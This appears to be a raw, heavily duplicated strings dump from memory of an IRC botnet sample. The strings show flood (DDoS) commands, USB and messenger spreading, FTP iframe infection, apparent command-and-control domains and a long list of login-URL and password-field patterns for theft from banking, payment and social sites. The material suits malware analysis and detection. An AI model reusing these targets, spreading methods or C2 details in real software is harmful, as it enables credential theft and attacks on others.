]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\svchost.exe
%System%\svchost.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
svchost.exe_1104_rwx_033C0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0=
tlSSSSSSSSSShL0=
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%WinDir%\System32\svchost.exe
%WinDir%\System32\svchost.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
svchost.exe_1164_rwx_00870000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
